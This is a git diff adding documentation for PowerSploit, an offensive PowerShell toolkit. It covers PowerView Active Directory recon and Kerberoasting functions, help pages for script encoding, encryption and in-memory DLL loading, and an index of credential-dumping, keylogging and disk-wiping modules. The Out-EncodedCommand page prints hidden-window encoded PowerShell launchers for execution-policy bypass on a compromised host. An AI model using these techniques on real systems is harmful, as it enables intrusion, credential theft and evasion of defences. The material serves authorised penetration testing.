+    Invoke-UserImpersonation        -   creates a new "runas /netonly" type logon and impersonates the token

+    Invoke-RevertToSelf             -   reverts any token impersonation

+    Get-DomainSPNTicket             -   request the kerberos ticket for a specified service principal name (SPN)

+    Invoke-Kerberoast               -   requests service tickets for kerberoast-able accounts and returns extracted ticket hashes

+    Get-PathAcl                     -   get the ACLs for a local/remote file path with optional group recursion

+

+

+### Domain/LDAP Functions:

+    Get-DomainDNSZone               -   enumerates the Active Directory DNS zones for a given domain

+    Get-DomainDNSRecord             -   enumerates the Active Directory DNS records for a given zone

+    Get-Domain                      -   returns the domain object for the current (or specified) domain

+    Get-DomainController            -   return the domain controllers for the current (or specified) domain

+    Get-Forest                      -   returns the forest object for the current (or specified) forest

+    Get-ForestDomain                -   return all domains for the current (or specified) forest

+    Get-ForestGlobalCatalog         -   return all global catalogs for the current (or specified) forest

+    Find-DomainObjectPropertyOutlier-   inds user/group/computer objects in AD that have 'outlier' properties set

+    Get-DomainUser                  -   return all users or specific user objects in AD

+    New-DomainUser                  -   creates a new domain user (assuming appropriate permissions) and returns the user object

+    Get-DomainUserEvent             -   enumerates account logon events (ID 4624) and Logon with explicit credential events

+    Get-DomainComputer              -   returns all computers or specific computer objects in AD

+    Get-DomainObject                -   returns all (or specified) domain objects in AD

+    Set-DomainObject                -   modifies a gven property for a specified active directory object

+    Get-DomainObjectAcl             -   returns the ACLs associated with a specific active directory object

+    Add-DomainObjectAcl             -   adds an ACL for a specific active directory object

+    Find-InterestingDomainAcl       -   finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects

+    Get-DomainOU                    -   search for all organization units (OUs) or specific OU objects in AD

+    Get-DomainSite                  -   search for all sites or specific site objects in AD

+    Get-DomainSubnet                -   search for all subnets or specific subnets objects in AD

+    Get-DomainSID                   -   returns the SID for the current domain or the specified domain

+    Get-DomainGroup                 -   return all groups or specific group objects in AD

+    New-DomainGroup                 -   creates a new domain group (assuming appropriate permissions) and returns the group object

+    Get-DomainManagedSecurityGroup  -   returns all security groups in the current (or target) domain that have a manager set

+    Get-DomainGroupMember           -   return the members of a specific domain group

+    Add-DomainGroupMember           -   adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so

+    Get-DomainFileServer            -   returns a list of servers likely functioning as file servers

+    Get-DomainDFSShare              -   returns a list of all fault-tolerant distributed file systems for the current (or specified) domain

+

+   

+### GPO functions

+

+    Get-DomainGPO                           -   returns all GPOs or specific GPO objects in AD

+    Get-DomainGPOLocalGroup                 -   returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences

+    Get-DomainGPOUserLocalGroupMapping      -   enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation

+    Get-DomainGPOComputerLocalGroupMapping  -   takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation

+    Get-DomainPolicy                        -   returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller

+

+

+### Computer Enumeration Functions

+

+    Get-NetLocalGroup                   -   enumerates the local groups on the local (or remote) machine

+    Get-NetLocalGroupMember             -   enumerates members of a specific local group on the local (or remote) machine

+    Get-NetShare                        -   returns open shares on the local (or a remote) machine

+    Get-NetLoggedon                     -   returns users logged on the local (or a remote) machine

+    Get-NetSession                      -   returns session information for the local (or a remote) machine

+    Get-RegLoggedOn                     -   returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys

+    Get-NetRDPSession                   -   returns remote desktop/session information for the local (or a remote) machine

+    Test-AdminAccess                    -   rests if the current user has administrative access to the local (or a remote) machine

+    Get-NetComputerSiteName             -   returns the AD site where the local (or a remote) machine resides

+    Get-WMIRegProxy                     -   enumerates the proxy server and WPAD conents for the current user

+    Get-WMIRegLastLoggedOn              -   returns the last user who logged onto the local (or a remote) machine

+    Get-WMIRegCachedRDPConnection       -   returns information about RDP connections outgoing from the local (or remote) machine

+    Get-WMIRegMountedDrive              -   returns information about saved network mounted drives for the local (or remote) machine

+    Get-WMIProcess                      -   returns a list of processes and their owners on the local or remote machine

+    Find-InterestingFile                -   searches for files on the given path that match a series of specified criteria

+

+

+### Threaded 'Meta'-Functions

+

+    Find-DomainUserLocation             -   finds domain machines where specific users are logged into

+    Find-DomainProcess                  -   finds domain machines where specific processes are currently running

+    Find-DomainUserEvent                -   finds logon events on the current (or remote domain) for the specified users

+    Find-DomainShare                    -   finds reachable shares on domain machines

+    Find-InterestingDomainShareFile     -   searches for files matching specific criteria on readable shares in the domain

+    Find-LocalAdminAccess               -   finds machines on the local domain where the current user has local administrator access

+    Find-DomainLocalGroupMember         -   enumerates the members of specified local group on machines in the domain

+

+

+### Domain Trust Functions:

+    Get-DomainTrust                     -   returns all domain trusts for the current domain or a specified domain

+    Get-ForestTrust                     -   returns all forest trusts for the current forest or a specified forest

+    Get-DomainForeignUser               -   enumerates users who are in groups outside of the user's domain

+    Get-DomainForeignGroupMember        -   enumerates groups with users outside of the group's domain and returns each foreign member

+    Get-DomainTrustMapping              -   this function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds

diff --git a/docs/ScriptModification/Out-CompressedDll.md b/docs/ScriptModification/Out-CompressedDll.md
new file mode 100755
index 0000000..df7cff5
--- /dev/null
+++ b/docs/ScriptModification/Out-CompressedDll.md
@@ -0,0 +1,60 @@
+# Out-CompressedDll

+

+## SYNOPSIS

+Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.

+

+PowerSploit Function: Out-CompressedDll  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Out-CompressedDll [-FilePath] <String>

+```

+

+## DESCRIPTION

+Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Out-CompressedDll -FilePath evil.dll

+```

+

+Description

+-----------

+Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.

+

+## PARAMETERS

+

+### -FilePath

+Specifies the path to a managed executable.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+Only pure MSIL-based dlls can be loaded using this technique.

+Native or IJW ('it just works' - mixed-mode) dlls will not load.

+

+## RELATED LINKS

+

+[http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html](http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html)

+

diff --git a/docs/ScriptModification/Out-EncodedCommand.md b/docs/ScriptModification/Out-EncodedCommand.md
new file mode 100755
index 0000000..6666796
--- /dev/null
+++ b/docs/ScriptModification/Out-EncodedCommand.md
@@ -0,0 +1,186 @@
+# Out-EncodedCommand

+

+## SYNOPSIS

+Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.

+

+PowerSploit Function: Out-EncodedCommand  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+### FilePath (Default)

+```

+Out-EncodedCommand [[-Path] <String>] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64] [-WindowStyle <String>]

+ [-EncodedOutput]

+```

+

+### ScriptBlock

+```

+Out-EncodedCommand [[-ScriptBlock] <ScriptBlock>] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64]

+ [-WindowStyle <String>] [-EncodedOutput]

+```

+

+## DESCRIPTION

+Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt.

+The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload.

+This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}

+```

+

+powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream(\[IO.MemoryStream\]\[Convert\]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),\[IO.Compression.CompressionMode\]::Decompress)),\[Text.Encoding\]::ASCII)).ReadToEnd()

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput

+```

+

+powershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=

+

+Description

+-----------

+Execute the above payload for the lulz.

+\>D

+

+## PARAMETERS

+

+### -ScriptBlock

+Specifies a scriptblock containing your payload.

+

+```yaml

+Type: ScriptBlock

+Parameter Sets: ScriptBlock

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -Path

+Specifies the path to your payload.

+

+```yaml

+Type: String

+Parameter Sets: FilePath

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -NoExit

+Outputs the option to not exit after running startup commands.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -NoProfile

+Outputs the option to not load the Windows PowerShell profile.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -NonInteractive

+Outputs the option to not present an interactive prompt to the user.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Wow64

+Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -WindowStyle

+Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -EncodedOutput

+Base-64 encodes the entirety of the output.

+This is usually unnecessary and effectively doubles the size of the output.

+This option is only for those who are extra paranoid.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip)

+

+## RELATED LINKS

+

+[http://www.exploit-monday.com](http://www.exploit-monday.com)

+

diff --git a/docs/ScriptModification/Out-EncryptedScript.md b/docs/ScriptModification/Out-EncryptedScript.md
new file mode 100755
index 0000000..36db457
--- /dev/null
+++ b/docs/ScriptModification/Out-EncryptedScript.md
@@ -0,0 +1,148 @@
+# Out-EncryptedScript

+

+## SYNOPSIS

+Encrypts text files/scripts.

+

+PowerSploit Function: Out-EncryptedScript  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Out-EncryptedScript [-ScriptPath] <String> [-Password] <SecureString> [-Salt] <String>

+ [[-InitializationVector] <String>] [[-FilePath] <String>]

+```

+

+## DESCRIPTION

+Out-EncryptedScript will encrypt a script (or any text file for that

+matter) and output the results to a minimally obfuscated script -

+evil.ps1 by default.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+$Password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+Out-EncryptedScript .\Naughty-Script.ps1 $Password salty

+

+Description

+-----------

+Encrypt the contents of this file with a password and salt.

+This will

+make analysis of the script impossible without the correct password

+and salt combination.

+This command will generate evil.ps1 that can

+dropped onto the victim machine.

+It only consists of a decryption

+function 'de' and the base64-encoded ciphertext.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+[String] $cmd = Get-Content .\evil.ps1

+```

+

+Invoke-Expression $cmd

+$decrypted = de password salt

+Invoke-Expression $decrypted

+

+Description

+-----------

+This series of instructions assumes you've already encrypted a script

+and named it evil.ps1.

+The contents are then decrypted and the

+unencrypted script is called via Invoke-Expression

+

+## PARAMETERS

+

+### -ScriptPath

+Path to this script

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Password

+Password to encrypt/decrypt the script

+

+```yaml

+Type: SecureString

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Salt

+Salt value for encryption/decryption.

+This can be any string value.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 3

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -InitializationVector

+Specifies a 16-character the initialization vector to be used.

+This

+is randomly generated by default.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 4

+Default value: ((1..16 | ForEach-Object {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join '')

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FilePath

+{{Fill FilePath Description}}

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 5

+Default value: .\evil.ps1

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+This command can be used to encrypt any text-based file/script

+

+## RELATED LINKS

+

diff --git a/docs/ScriptModification/Remove-Comment.md b/docs/ScriptModification/Remove-Comment.md
new file mode 100755
index 0000000..97335ae
--- /dev/null
+++ b/docs/ScriptModification/Remove-Comment.md
@@ -0,0 +1,110 @@
+# Remove-Comment

+

+## SYNOPSIS

+Strips comments and extra whitespace from a script.

+

+PowerSploit Function: Remove-Comment  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+### FilePath (Default)

+```

+Remove-Comment [-Path] <String>

+```

+

+### ScriptBlock

+```

+Remove-Comment [-ScriptBlock] <ScriptBlock>

+```

+

+## DESCRIPTION

+Remove-Comment strips out comments and unnecessary whitespace from a script.

+This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.

+

+A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script.

+You rock, Lee!

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+$Stripped = Remove-Comment -Path .\ScriptWithComments.ps1

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Remove-Comment -ScriptBlock {

+```

+

+### This is my awesome script.

+My documentation is beyond reproach!

+      Write-Host 'Hello, World!' ### Write 'Hello, World' to the host

+### End script awesomeness

+}

+

+Write-Host 'Hello, World!'

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Remove-Comment -Path Inject-Shellcode.ps1 | Out-EncodedCommand

+```

+

+Description

+-----------

+Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand.

+

+## PARAMETERS

+

+### -Path

+Specifies the path to your script.

+

+```yaml

+Type: String

+Parameter Sets: FilePath

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ScriptBlock

+Specifies a scriptblock containing your script.

+

+```yaml

+Type: ScriptBlock

+Parameter Sets: ScriptBlock

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### System.String, System.Management.Automation.ScriptBlock

+

+Accepts either a string containing the path to a script or a scriptblock.

+

+## OUTPUTS

+

+### System.Management.Automation.ScriptBlock

+

+Remove-Comment returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.exploit-monday.com

+http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/]()

+

diff --git a/docs/index.md b/docs/index.md
new file mode 100644
index 0000000..9c001da
--- /dev/null
+++ b/docs/index.md
@@ -0,0 +1,150 @@
+## Overview
+PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
+
+### CodeExecution
+Execute code on a target machine.
+
+    Invoke-DllInjection - Injects a Dll into the process ID of your choosing.
+    Invoke-ReflectivePEInjection - Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
+    Invoke-Shellcode - Injects shellcode into the process ID of your choosing or within PowerShell locally.
+    Invoke-WmiCommand - Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel
+
+### ScriptModification
+Modify and/or prepare scripts for execution on a compromised machine.
+
+    Out-EncodedCommand - Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
+    Out-CompressedDll - Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
+    Out-EncryptedScript - Encrypts text files/scripts.
+    Remove-Comment - Strips comments and extra whitespace from a script.
+
+### Persistence
+
+Add persistence capabilities to a PowerShell script.
+
+    New-UserPersistenceOption - Configure user-level persistence options for the Add-Persistence function.
+    New-ElevatedPersistenceOption - Configure elevated persistence options for the Add-Persistence function.
+    Add-Persistence - Add persistence capabilities to a script.
+    Install-SSP - Installs a security support provider (SSP) dll.
+    Get-SecurityPackage - Enumerates all loaded security packages (SSPs).
+
+### AntivirusBypass
+AV doesn't stand a chance against PowerShell!
+
+    Find-AVSignature - Locates single Byte AV signatures utilizing the same method as DSplit from "class101".
+
+### Exfiltration
+All your data belong to me!
+
+    Invoke-TokenManipulation - Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.
+    Invoke-CredentialInjection - Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).
+    Invoke-NinjaCopy - Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
+    Invoke-Mimikatz - Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.
+    Get-Keystrokes - Logs keys pressed, time and the active window.
+    Get-GPPPassword - Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
+    Get-GPPAutologon - Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.
+    Get-TimedScreenshot - A function that takes screenshots at a regular interval and saves them to a folder.
+    New-VolumeShadowCopy - Creates a new volume shadow copy.
+    Get-VolumeShadowCopy - Lists the device paths of all local volume shadow copies.
+    Mount-VolumeShadowCopy - Mounts a volume shadow copy.
+    Remove-VolumeShadowCopy - Deletes a volume shadow copy.
+    Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials.
+    Out-Minidump - Generates a full-memory minidump of a process.
+    Get-MicrophoneAudio - Records audio from system microphone and saves to disk.
+
+### Mayhem
+Cause general mayhem with PowerShell.
+
+    Set-MasterBootRecord - Proof of concept code that overwrites the master boot record with the message of your choice.
+    Set-CriticalProcess - Causes your machine to blue screen upon exiting PowerShell.
+
+### Privesc
+Tools to help with escalating privileges on a target, including PowerUp.
+
+    PowerUp - Clearing house of common privilege escalation checks, along with some weaponization vectors. 
+    Get-System - GetSystem functionality inspired by Meterpreter's getsystem
+
+### Recon
+Tools to aid in the reconnaissance phase of a penetration test, including PowerView.
+
+    Invoke-Portscan - Does a simple port scan using regular sockets, based (pretty) loosely on nmap.
+    Get-HttpStatus - Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.
+    Invoke-ReverseDnsLookup - Scans an IP address range for DNS PTR records.
+    PowerView - PowerView is series of functions that performs network and Windows domain enumeration and exploitation.
+
+## License
+
+The PowerSploit project and all individual scripts are under the [BSD 3-Clause license](https://raw.github.com/mattifestation/PowerSploit/master/LICENSE) unless explicitly noted otherwise.
+
+## Usage
+
+Refer to the comment-based help in each individual script for detailed usage information.
+
+To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
+
+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
+
+To use the module, type `Import-Module PowerSploit`
+
+To see the commands imported, type `Get-Command -Module PowerSploit`
+
+If you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerSploit into your module path, run the following one-liner:
+`$Env:PSModulePath.Split(';') |
+ % { if ( Test-Path (Join-Path $_ PowerSploit) )
+ {Get-ChildItem $_ -Recurse | Unblock-File} }`
+
+For help on each individual command, Get-Help is your friend.
+
+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
+
+## Contribution Rules
+
+We need contributions! If you have a great idea for PowerSploit, we'd love to add it. New additions will require the following:
+
+* The script must adhere to the style guide. Any exceptions to the guide line would need an explicit, valid reason.
+* The module manifest needs to be updated to reflect the new function being added.
+* A brief description of the function should be added to this README.md
+* Pester tests must accompany all new functions. See the Tests folder for examples but we are looking for tests that at least cover the basics by testing for expected/unexpected input/output and that the function exhibits desired functionality. Make sure the function is passing all tests (preferably in mutiple OSes) prior to submitting a pull request. Thanks!
+
+## Script Style Guide
+
+**For all contributors and future contributors to PowerSploit, I ask that you follow this style guide when writing your scripts/modules.**
+
+* Avoid Write-Host **at all costs**. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles:
+   * <http://blogs.technet.com/b/heyscriptingguy/archive/2011/05/19/create-custom-objects-in-your-powershell-script.aspx>
+   * <http://technet.microsoft.com/en-us/library/ff730946.aspx>
+
+* If you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on '-Verbose'.
+
+* Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license).
+
+* Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis.
+
+* I prefer that variable names be capitalized and be as descriptive as possible.
+
+* Provide logical spacing in between your code. Indent your code to make it more readable.
+
+* If you find yourself repeating code, write a function.
+
+* Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use 'Throw'. If you have an error that doesn't need to stop execution, use Write-Error.
+
+* If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible.
+
+* Do not use hardcoded paths. A script should be useable right out of the box. No one should have to modify the code unless they want to.
+
+* PowerShell v2 compatibility is highly desired.
+
+* Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I'm looking for something like the following:
+   * `[Parameter(Position = 0, Mandatory = $True)]`
+
+* Don't use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias.
+
+* Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break.
+
+* Don't go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader.
+
+* Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement.
+
+* Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters.
+
+* If a script creates complex custom objects, include a ps1xml file that will properly format the object's output.
diff --git a/mkdocs.yml b/mkdocs.yml
new file mode 100644
index 0000000..f4a0608
--- /dev/null
+++ b/mkdocs.yml
@@ -0,0 +1,147 @@
+site_name: PowerSploit
+repo_url: https://github.com/PowerShellMafia/PowerSploit/
+site_favicon: favicon.ico
+pages:
+- Home: 'index.md'
+- Recon:
+    - About: 'Recon/index.md'
+    - Functions:
+        - Export-PowerViewCSV: 'Recon/Export-PowerViewCSV.md'
+        - Resolve-IPAddress: 'Recon/Resolve-IPAddress.md'
+        - ConvertTo-SID: 'Recon/ConvertTo-SID.md'
+        - ConvertFrom-SID: 'Recon/ConvertFrom-SID.md'
+        - Convert-ADName: 'Recon/Convert-ADName.md'
+        - ConvertFrom-UACValue: 'Recon/ConvertFrom-UACValue.md'
+        - Add-RemoteConnection: 'Recon/Add-RemoteConnection.md'
+        - Remove-RemoteConnection: 'Recon/Remove-RemoteConnection.md'
+        - Invoke-UserImpersonation: 'Recon/Invoke-UserImpersonation.md'
+        - Invoke-RevertToSelf: 'Recon/Invoke-RevertToSelf.md'
+        - Get-DomainSPNTicket: 'Recon/Get-DomainSPNTicket.md'
+        - Invoke-Kerberoast: 'Recon/Invoke-Kerberoast.md'
+        - Get-PathAcl: 'Recon/Get-PathAcl.md'
+        - Get-DomainDNSZone: 'Recon/Get-DomainDNSZone.md'
+        - Get-DomainDNSRecord: 'Recon/Get-DomainDNSRecord.md'
+        - Get-Domain: 'Recon/Get-Domain.md'
+        - Get-DomainController: 'Recon/Get-DomainController.md'
+        - Get-Forest: 'Recon/Get-Forest.md'
+        - Get-ForestDomain: 'Recon/Get-ForestDomain.md'
+        - Get-ForestGlobalCatalog: 'Recon/Get-ForestGlobalCatalog.md'
+        - Find-DomainObjectPropertyOutlier: 'Recon/Find-DomainObjectPropertyOutlier.md'
+        - Get-DomainUser: 'Recon/Get-DomainUser.md'
+        - New-DomainUser: 'Recon/New-DomainUser.md'
+        - Set-DomainUserPassword: 'Recon/Set-DomainUserPassword.md'
+        - Get-DomainUserEvent: 'Recon/Get-DomainUserEvent.md'
+        - Get-DomainComputer: 'Recon/Get-DomainComputer.md'
+        - Get-DomainObject: 'Recon/Get-DomainObject.md'
+        - Set-DomainObject: 'Recon/Set-DomainObject.md'
+        - Set-DomainObjectOwner: 'Recon/Set-DomainObjectOwner.md'
+        - Get-DomainObjectAcl: 'Recon/Get-DomainObjectAcl.md'
+        - Add-DomainObjectAcl: 'Recon/Add-DomainObjectAcl.md'
+        - Find-InterestingDomainAcl: 'Recon/Find-InterestingDomainAcl.md'
+        - Get-DomainOU: 'Recon/Get-DomainOU.md'
+        - Get-DomainSite: 'Recon/Get-DomainSite.md'
+        - Get-DomainSubnet: 'Recon/Get-DomainSubnet.md'
+        - Get-DomainSID: 'Recon/Get-DomainSID.md'
+        - Get-DomainGroup: 'Recon/Get-DomainGroup.md'
+        - New-DomainGroup: 'Recon/New-DomainGroup.md'
+        - Get-DomainManagedSecurityGroup: 'Recon/Get-DomainManagedSecurityGroup.md'
+        - Get-DomainGroupMember: 'Recon/Get-DomainGroupMember.md'
+        - Add-DomainGroupMember: 'Recon/Add-DomainGroupMember.md'
+        - Get-DomainFileServer: 'Recon/Get-DomainFileServer.md'
+        - Get-DomainDFSShare: 'Recon/Get-DomainDFSShare.md'
+        - Get-DomainGPO: 'Recon/Get-DomainGPO.md'
+        - Get-DomainGPOLocalGroup: 'Recon/Get-DomainGPOLocalGroup.md'
+        - Get-DomainGPOUserLocalGroupMapping: 'Recon/Get-DomainGPOUserLocalGroupMapping.md'
+        - Get-DomainGPOComputerLocalGroupMapping: 'Recon/Get-DomainGPOComputerLocalGroupMapping.md'
+        - Get-DomainPolicy: 'Recon/Get-DomainPolicy.md'
+        - Get-NetLocalGroup: 'Recon/Get-NetLocalGroup.md'
+        - Get-NetLocalGroupMember: 'Recon/Get-NetLocalGroupMember.md'
+        - Get-NetShare: 'Recon/Get-NetShare.md'
+        - Get-NetLoggedon: 'Recon/Get-NetLoggedon.md'
+        - Get-NetSession: 'Recon/Get-NetSession.md'
